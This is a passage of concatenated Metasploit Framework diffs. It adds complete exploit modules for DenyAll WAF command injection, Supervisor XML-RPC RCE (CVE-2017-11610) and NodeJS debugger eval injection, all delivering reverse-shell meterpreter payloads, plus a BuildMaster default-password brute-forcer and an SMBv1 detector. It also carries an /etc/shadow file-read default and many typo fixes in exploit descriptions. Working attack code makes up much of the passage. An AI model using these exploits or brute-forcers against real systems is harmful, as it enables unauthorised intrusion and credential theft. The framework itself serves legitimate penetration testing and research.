@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
@versions.each do |version|
print_status("#{host}:#{rport} fuzzing version #{version} control messages (mode 6)")
@mode_6_operations.each do |op|
request = Rex::Proto::NTP.ntp_control(version, op)
request = Rex::Proto::NTP.ntp_control(version, op).to_binary_s
what = "#{request.size}-byte version #{version} mode 6 op #{op} message"
vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}")
responses = probe(host, datastore['RPORT'].to_i, request)
@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("#{host}:#{rport} fuzzing version #{version} private messages (mode 7)")
@mode_7_implementations.each do |implementation|
@mode_7_request_codes.each do |request_code|
request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188)
request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188).to_binary_s
what = "#{request.size}-byte version #{version} mode 7 imp #{implementation} req #{request_code} message"
vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}")
responses = probe(host, datastore['RPORT'].to_i, request)
@ -164,6 +164,7 @@ class MetasploitModule < Msf::Auxiliary
# TODO: is there a better way to pick this size? Should more than one be tried?
request.payload = SecureRandom.random_bytes(16)
end
request = request.to_binary_s
what = "#{request.size}-byte #{short ? 'short ' : nil}version #{version} mode #{mode} message"
vprint_status("#{host}:#{rport} probing with #{what}")
responses = probe(host, datastore['RPORT'].to_i, request)

View File

@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('SSLVersion', [true, 'SSL version', 'TLS1']),
OptString.new('TARGETURI', [ true, "Base directory path", '/']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
])
]
)
end
def run

View File

@ -0,0 +1,96 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Inedo BuildMaster Login Scanner',
'Description' => %{
This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'
which has the default password 'Admin'.
},
'Author' => [ 'James Otten <jamesotten1[at]gmail.com>' ],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'VERBOSE' => true })
)
register_options(
[
Opt::RPORT(81),
OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),
OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])
]
)
end
def run_host(ip)
return unless buildmaster?
each_user_pass do |user, pass|
do_login(user, pass)
end
end
def buildmaster?
begin
res = send_request_cgi('uri' => '/log-in')
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{peer} - HTTP Connection Failed")
return false
end
if res && res.code == 200 && res.body.include?('BuildMaster_Version')
version = res.body.scan(%r{<span id="BuildMaster_Version">(.*)</span>}).flatten.first
print_good("#{peer} - Identified BuildMaster #{version}")
return true
else
print_error("#{peer} - Application does not appear to be BuildMaster")
return false
end
end
def login_succeeded?(res)
if res && res.code == 200
body = JSON.parse(res.body)
return body.key?('succeeded') && body['succeeded']
end
false
rescue
false
end
def do_login(user, pass)
print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',
'method' => 'POST',
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
'vars_post' =>
{
'userName' => user,
'password' => pass
}
}
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
vprint_error("#{peer} - HTTP Connection Failed...")
return :abort
end
if login_succeeded?(res)
print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
store_valid_credential(user: user, private: pass)
else
print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
end
end
end

View File

@ -22,14 +22,9 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
Opt::RPORT(1241),
OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
])
register_advanced_options(
[
OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
])
OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users")
]
)
end
def run_host(ip)

View File

@ -20,13 +20,8 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(9390),
OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
])
register_advanced_options(
[
OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
])
]
)
end
def run_host(ip)

View File

@ -20,13 +20,8 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RPORT(9391),
OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
])
register_advanced_options(
[
OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"])
])
]
)
end
def run_host(ip)

View File

@ -0,0 +1,76 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
# Exploit mixins should go first
include Msf::Exploit::Remote::Tcp
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize
super(
'Name' => 'SMBv1 Protocol Detection',
'Description' => 'Detect systems that support the SMBv1 protocol',
'Author' => 'Chance Johnson @loftwing',
'License' => MSF_LICENSE
)
register_options([ Opt::RPORT(445) ])
end
# Modified from smb2 module by @hdm
# Fingerprint a single host
def run_host(ip)
begin
connect
# Only accept NT LM 0.12 dialect and WfW3.0
dialects = ['PC NETWORK PROGRAM 1.0',
'LANMAN1.0',
'Windows for Workgroups 3.1a',
'LM1.2X002',
'LANMAN2.1',
'NT LM 0.12']
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
pkt['Payload']['SMB'].v['Flags1'] = 0x08
pkt['Payload']['SMB'].v['Flags2'] = 0xc801
pkt['Payload'].v['Payload'] = data
pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000)
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)
sock.put(pkt.to_s)
res = sock.get_once
# expecting \xff instead of \xfe
if res && res.index("\xffSMB")
print_good("#{ip} supports SMBv1 dialect.")
report_note(
host: ip,
proto: 'tcp',
sname: 'smb1',
port: rport,
type: "supports SMB 1"
)
end
rescue ::Rex::ConnectionError
rescue EOFError
rescue Errno::ECONNRESET
rescue ::Exception => e
print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}")
ensure
disconnect
end
end
end

View File

@ -124,11 +124,15 @@ class MetasploitModule < Msf::Auxiliary
)
end
rescue ::Rex::ConnectionError
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
print_error("A network issue has occurred: #{e.message}")
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
rescue Timeout::Error
print_error("#{target_host}:#{rport} Timed out after #{to} seconds")
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
rescue ::Exception => e
print_error("#{target_host}:#{rport} Error: #{e} #{e.backtrace}")
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
ensure
disconnect
end

View File

@ -0,0 +1,103 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 3001,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "Sep 19 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
]
)
end
def get_token
# Taking token by exploiting bug on first endpoint.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
'applianceUid' => 'LOCALUID',
'typeOf' => 'debug'
}
})
if res && res.code == 200 && res.body.include?("iToken")
res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
else
nil
end
end
def check
# If we've managed to get token, that means target is most likely vulnerable.
token = get_token
if token.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
# Get iToken from unauthenticated accessible endpoint
print_status('Extracting iToken value')
token = get_token
if token.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Awesome. iToken value = #{token}")
end
# Accessing to the vulnerable second endpoint where we have command injection with valid iToken
print_status('Trigerring command injection vulnerability with iToken value.')
r = rand_text_alpha(5 + rand(3));
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
'vars_post' => {
'iToken' => token,
'tag' => 'tunnel',
'stime' => r,
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
}
})
end
end

View File

@ -0,0 +1,169 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Calum Hutton <c.e.hutton@gmx.com>'
],
'References' =>
[
['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
['URL', 'https://www.debian.org/security/2017/dsa-3942'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],
['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
['CVE', '2017-11610']
],
'Platform' => 'linux',
'Targets' =>
[
['3.0a1-3.3.2', {}]
],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'DefaultOptions' =>
{
'RPORT' => 9001,
'Payload' => 'linux/x64/meterpreter/reverse_tcp',
},
'Privileged' => false,
'DisclosureDate' => 'Jul 19 2017',
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(9001),
OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
]
)
end
def check_version(version)
if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
return true
else
return false
end
end
def check
print_status('Extracting version from web interface..')
params = {
'method' => 'GET',
'uri' => normalize_uri('/')
}
if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
end
res = send_request_cgi(params)
if res
if res.code == 200
match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
if match
version = Gem::Version.new(match[1])
if check_version(version)
print_good("Vulnerable version found: #{version}")
return Exploit::CheckCode::Appears
else
print_bad("Version #{version} is not vulnerable")
return Exploit::CheckCode::Safe
end
else
print_bad('Could not extract version number from web interface')
return Exploit::CheckCode::Unknown
end
elsif res.code == 401
print_bad("Authentication failed: #{res.code} response")
return Exploit::CheckCode::Safe
else
print_bad("Unexpected HTTP code: #{res.code} response")
return Exploit::CheckCode::Unknown
end
else
print_bad('Error connecting to web interface')
return Exploit::CheckCode::Unknown
end
end
def execute_command(cmd, opts = {})
# XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
# Credit to the following urls for the os.system() payload
# https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
# https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
xml_payload = %{<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>
</param>
</params>
</methodCall>}
# Send the XML-RPC payload via POST to the specified endpoint
endpoint_path = target_uri.path
print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")
params = {
'method' => 'POST',
'uri' => normalize_uri(endpoint_path),
'ctype' => 'text/xml',
'headers' => {'Accept' => 'text/xml'},
'data' => xml_payload,
'encode_params' => false
}
if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
end
return send_request_cgi(params, timeout=5)
end
def exploit
res = execute_cmdstager(:linemax => 800)
if res
if res.code == 401
fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
elsif res.code == 404
fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
else
fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
end
else
print_good('Request returned without status code, usually indicates success. Passing to handler..')
handler
end
end
end

View File

@ -0,0 +1,90 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n"
def initialize(info={})
super(update_info(info,
'Name' => "NodeJS Debugger Command Injection",
'Description' => %q{
This module uses the "evaluate" request type of the NodeJS V8
debugger protocol (version 1) to evaluate arbitrary JS and
call out to other system commands. The port (default 5858) is
not exposed non-locally in default configurations, but may be
exposed either intentionally or via misconfiguration.
},
'License' => MSF_LICENSE,
'Author' => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
'References' =>
[
[ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
[ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
],
'Targets' =>
[
['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
],
'Privileged' => false,
'DisclosureDate' => "Aug 15 2016",
'DefaultTarget' => 0)
)
register_options(
[
Opt::RPORT(5858)
])
end
def make_eval_message
msg_body = { seq: 1,
type: 'request',
command: 'evaluate',
arguments: { expression: payload.encoded,
global: true,
maxStringLength:-1
}
}.to_json
msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
msg_header + msg_body
end
def check
connect
res = sock.get_once
disconnect
if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
vprint_status("Got debugger handshake:\n#{res}")
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Unknown
end
def exploit
connect
# must consume incoming handshake before sending payload
buf = sock.get_once
msg = make_eval_message
print_status("Sending #{msg.length} byte payload...")
vprint_status("#{msg}")
sock.put(msg)
buf = sock.get_once
if buf.include? '"command":"evaluate","success":true'
print_status("Got success response")
elsif buf.include? '"command":"evaluate","success":false'
print_error("Got failure response: #{buf}")
else
print_error("Got unexpected response: #{buf}")
end
end
end

View File

@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
rendering engine. It is possible to redirect the output of a XSLT
transformation to an arbitrary file. The content of the created file must be
ASCII or UTF-8. The destination path can be relative or absolute. This module
has been tested on Safari and Maxthon. Code execution can be acheived by first
has been tested on Safari and Maxthon. Code execution can be achieved by first
uploading the payload to the remote machine in VBS format, and then upload a MOF
file, which enables Windows Management Instrumentation service to execute the VBS.
},

View File

@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote
super( update_info(info,
'Name' => 'TeeChart Professional ActiveX Control Trusted Integer Dereference',
'Description' => %q{
This module exploits a integer overflow in TeeChart Pro ActiveX control. When
This module exploits an integer overflow in TeeChart Pro ActiveX control. When
sending an overly large/negative integer value to the AddSeries() property of
TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the
TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the
value and is later directly trusted and called upon.
This module has been designed to bypass DEP only under IE8 with Java support. Multiple

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-
based buffer overflow will occur when copying attacker-supplied data using the
sprintf function.

View File

@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Winamp Playlist UNC Path Computer Name Overflow',
'Description' => %q{
This module exploits a vulnerability in the Winamp media player.
This flaw is triggered when a audio file path is specified, inside a
This flaw is triggered when an audio file path is specified, inside a
playlist, that consists of a UNC path with a long computer name. This
module delivers the playlist via the browser. This module has only
been successfully tested on Winamp 5.11 and 5.12.

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack buffer overflow in Winamp 5.24. By
sending an overly long artist tag, a remote attacker may
be able to execute arbitrary code. This vulnerability can be
exploited from the browser or the winamp client itself.
exploited from the browser or the Winamp client itself.
},
'Author' => 'MC',
'License' => MSF_LICENSE,

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX
control in InterVideo WinDVD 7. By sending a overly long string
control in InterVideo WinDVD 7. By sending an overly long string
to the "ApplicationType()" property, an attacker may be able to
execute arbitrary code.
},

View File

@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
opt-in to ASLR. As such, this module should be reliable on all Windows
versions.
The WMI Adminsitrative Tools are a standalone download & install (linked in the
The WMI Administrative Tools are a standalone download & install (linked in the
references).
},

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the
X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun
X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun
a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.
},
'License' => MSF_LICENSE,

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX
Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string
Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string
to the "fvCom()" method from a yahoo.com domain, an attacker may be able
to execute arbitrary code.
},

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX
Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.
By sending a overly long string to the "Server()" method, and then calling
By sending an overly long string to the "Server()" method, and then calling
the "Send()" method, an attacker may be able to execute arbitrary code.
Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp"
yield for the best results.

View File

@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
streams with certain MAPI attachment properties, it is possible to set a path name
to files to be executed. When a user double clicks on such an attachment or message,
Outlook will proceed to execute the file that is set by the path name value. These
files can be local files, but also file stored remotely for example on a file share.
Exploitation is limited by the fact that its is not possible for attackers to supply
command line options.
files can be local files, but also files stored remotely (on a file share, for example)
can be used. Exploitation is limited by the fact that it is not possible for attackers
to supply command line options.
},
'Author' => 'Yorick Koster <yorick[at]akitasecurity.nl>',
'References' =>

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability
occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges
of the user running the application . This module has been tested successfully on
of the user running the application. This module has been tested successfully on
ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,

View File

@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
NOTE: This module uses a similar DEP bypass method to that used within the
adobe_libtiff module. This method is unlikely to work across various
Windows versions due a the hardcoded syscall number.
Windows versions due to a hardcoded syscall number.
},
'License' => MSF_LICENSE,
'Author' =>

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Adobe Reader ToolButton Use After Free',
'Description' => %q{
This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6
This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6
and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where
the cEnable callback can be used to early free the object memory. Later use of the object
allows triggering the use after free condition. This module has been tested successfully

View File

@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Apple Quicktime. The flaw is
triggered when Quicktime fails to properly handle the data length for certain
This module exploits a vulnerability found in Apple QuickTime. The flaw is
triggered when QuickTime fails to properly handle the data length for certain
atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
overflow by loading a specially crafted .mov file, and allows arbitrary
code execution under the context of the current user. Please note: Since an egghunter

View File

@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Audiotran.
PLS file within a browser, when the PLS extension is registered to Audiotran.
This functionality has not been tested in this module.
},
'License' => MSF_LICENSE,

View File

@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4.
An attacker must send the file to victim and the victim must open the file.
Alternatively, it may be possible to execute code remotely via an embedded
PLS file within a browser when the PLS extention is registered to Audiotran.
PLS file within a browser when the PLS extension is registered to Audiotran.
This alternate vector has not been tested and cannot be exercised directly
with this module.
},

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a vulnerability found in Aviosoft Digital TV Player
Pro version 1.x. An overflow occurs when the process copies the content of a
playlist file on to the stack, which may result aribitrary code execution under
playlist file on to the stack, which may result arbitrary code execution under
the context of the user.
},
'License' => MSF_LICENSE,

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit
'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow",
'Description' => %q{
This module exploits a stack-based buffer overflow on Beetel Connection Manager. The
vulnerability exists in the parising of the UserName parameter in the NetConfig.ini
vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini
file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP
SP3 and Windows 7 SP1.
},

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'CA Antivirus Engine CAB Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.
By creating a specially crafted CAB file, an an attacker may be able
By creating a specially crafted CAB file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
a m3u playlist with a long track name, a SEH exception record can be overwritten
with parts of the controllable buffer. SEH execution is triggered after an
invalid read of an injectible address, thus allowing arbitrary code execution.
invalid read of an injectable address, thus allowing arbitrary code execution.
This module works on multiple Windows platforms including: Windows XP SP3,
Windows Vista, and Windows 7.
},

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a buffer overflow vulnerability found in Chasys Draw IES
(version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
parsing BMP files, where the ReadFile function is used to store user provided data
on the stack in a insecure way. It results in arbitrary code execution under the
on the stack in an insecure way. It results in arbitrary code execution under the
context of the user viewing a specially crafted BMP file. This module has been
tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
SP1.

View File

@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
similar except an additional SpecialFolderDataBlock is included. The folder ID set
in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
DLL file.
},

View File

@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc).
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
DBR file within a browser, since the DBR extention is registered to DeepBurner.
DBR file within a browser, since the DBR extension is registered to DeepBurner.
},
'License' => MSF_LICENSE,
'Author' =>

View File

@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and
Standard. By supplying a long string of data in a plf file (playlist), the
MediaPlayerCtrl.dll component will attempt to extract a filename out of the string,
and then copy it on the stack without any proper bounds checking, which casues a
buffer overflow, and results arbitrary code execution under the context of the user.
and then copy it on the stack without any proper bounds checking, which causes a
buffer overflow, and results in arbitrary code execution under the context of the user.
This module has been designed to target common Windows systems such as:
Windows XP SP2/SP3, Windows Vista, and Windows 7.

View File

@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control
(KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's
This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control
(KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's
Documentation ApplicationXtender 5.4.
},
'License' => MSF_LICENSE,

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
function ERM_convert_to_correct_webpath handles user provided data in a insecure
function ERM_convert_to_correct_webpath handles user provided data in an insecure
way. It results in arbitrary code execution under the context of the user viewing
a specially crafted .ers file. This module has been tested successfully with ERS
Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
The vulnerability exists in the module ermapper_u.dll, where the function
rf_report_error handles user provided data in a insecure way. It results in
rf_report_error handles user provided data in an insecure way. It results in
arbitrary code execution under the context of the user viewing a specially crafted
.ers file. This module has been tested successfully with ERS Viewer 2013 (versions
13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HTML Help Workshop 4.74
By creating a specially crafted hhp file, an an attacker may be able
By creating a specially crafted hhp file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,

View File

@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
'Description' => %q{
